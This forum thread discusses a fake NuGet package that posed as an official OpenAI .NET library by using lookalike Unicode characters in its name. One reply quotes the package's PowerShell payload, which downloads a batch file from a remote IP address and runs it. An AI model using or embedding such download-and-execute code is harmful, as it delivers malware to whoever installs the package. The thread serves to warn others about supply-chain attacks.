Problem with "Official" OpenAi .NET Package? (Edit: It's a fake package)

ThioJoe · July 16, 2023, 5:16pm

I’m using Visual Studio 2022 Enterprise, and I tried to install the following Nuget package:
[REMOVED BECAUSE MALICIOUS]

But I’m getting the following error:

Error MSB5016 The name “PkgOpеոAI” contains an invalid character “е”. The project file is invalid on disk and was not reloaded.

Using a unicode character inspector such as this, it looks like instead of regular latin characters, the “e” and “n” are actually the following:
CYRILLIC SMALL LETTER IE
ARMENIAN SMALL LETTER VO

Sooo lol what? Is that actually an official package or some kind of fake?

Edit: Ok the package now looks super sus. I think it’s a fake, there are other packages by that same account also with weird characters in them, and all created 5 days ago)

RonaldGRuckus · July 16, 2023, 5:24pm

Looking at the file I hope you rev up your anti-virus

$URL = "http://45.###.66.##/download/Anthrax.bat"  
$FilePath = "C:\Windows\Temp\Anthrax.bat"
Invoke-WebRequest -Uri $URL -OutFile $FilePath
cmd.exe /c $FilePath
Clear-Host

There was actually a fun article regarding this exact attack vector. Did ChatGPT write this repository?

Here’s the article:

ThioJoe · July 16, 2023, 5:27pm

AppLocker saved me

smuzani · July 17, 2023, 2:43am

Yeah, fake characters are usually a telltale sign of phishing. There’s been a lot of questions like “how did my API key get compromised”, and I think this is just one of the possibilities. Open AI API keys are quite valuable now as people can use them to generate fake reviews or whatever.

I’m personally skeptical enough that I do that part myself. It’s not hard to just do a POST call and handle the errors, and it looks like even the official OpenAI ones lag behind some of the latest changes.

theevildays · July 17, 2023, 2:49am

Holy moly does Nuget even validate their packages?

sps · July 17, 2023, 3:15am

Hi @ThioJoe
There are no official packages for .NET.

Only community libraries are available for C# / .NET, as of now.

Let us know if you used one of them.

Fusseldieb · July 17, 2023, 12:28pm

@ThioJoe 's channel was this → . ← close to turning into Elon Musk

Jokes apart, good thing it was noticed!

ThioJoe · July 17, 2023, 4:44pm

Apparently not. Lesson learned

theevildays · July 17, 2023, 4:48pm

Wow this is crazy, idk how many malicious stuffs could be uploaded.
What about Pypi?

ThioJoe · July 17, 2023, 5:07pm

Yep, I believe with Pypi they targeted mis-spellings: Latest attack on PyPI users shows crooks are only getting better | Ars Technica

JoshuaKirby · July 21, 2023, 11:44pm

Wow, I’ve used alot of random pypi packages in my time, I hope i don’t get a virus
@ThioJoe what can I do to prevent that?

theevildays · July 23, 2023, 10:20am

Haha same here, I think you can prevent using root to install stuffs, that’s first, and only install known and trusted packages.

Topic		Replies	Views
Beware Malicious Malware Disguised as "ChatGPT" Community	6	3168	March 30, 2023
Account hacked charged a lot of API calls API	15	2833	December 21, 2023
A false page pretending to be sora (scam!) Community sora	46	12588	September 13, 2024
OpenAI Threatens Popular GitHub Project With Lawsuit Over API Use Community lawsuit , takedown , open-source , github	6	2327	April 30, 2023
OpenAI's Impersonation - Possible fraudulent use of OpenAI's Chat Bot Community	6	4056	September 3, 2024

Problem with "Official" OpenAi .NET Package? (Edit: It's a fake package)

Related topics